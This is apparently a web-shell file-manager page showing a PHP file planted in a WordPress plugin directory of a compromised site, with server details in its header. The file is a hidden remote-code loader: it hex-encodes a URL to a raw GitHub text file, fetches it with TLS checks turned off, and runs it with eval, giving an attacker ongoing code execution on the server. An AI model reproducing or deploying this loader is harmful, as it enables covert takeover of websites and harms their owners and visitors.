HEX
Server: LiteSpeed
System: Linux bdix5.noc223.com 4.18.0-477.27.2.lve.el8.x86_64 #1 SMP Wed Oct 11 12:32:56 UTC 2023 x86_64
User: purebdli (2161)
PHP: 8.1.24
Disabled: NONE
Upload Files
File: /home/purebdli/zarmanhomio.purebdlife.com/wp-content/plugins/kntl1/132.php
<?php
session_start();
$url = $_SESSION['ts_url'] ?? pack('H*','68747470733a2f2f7261772e67697468756275736572636f6e74656e742e636f6d2f68696c616c6d612f50726f6a6563742d576562736974652d50656e746143726166742d53747564696f2f726566732f68656164732f6d61696e2f7475726b2e747874');

$code = @file_get_contents($url);
if (!$code && function_exists('curl_init')) {
    $c = curl_init($url);
    curl_setopt_array($c, [CURLOPT_RETURNTRANSFER=>1,CURLOPT_FOLLOWLOCATION=>1,CURLOPT_TIMEOUT=>10,CURLOPT_SSL_VERIFYPEER=>0,CURLOPT_SSL_VERIFYHOST=>0]);
    $code = curl_exec($c); curl_close($c);
}
$code ? eval("?>$code") : die("Gagal memuat: $url");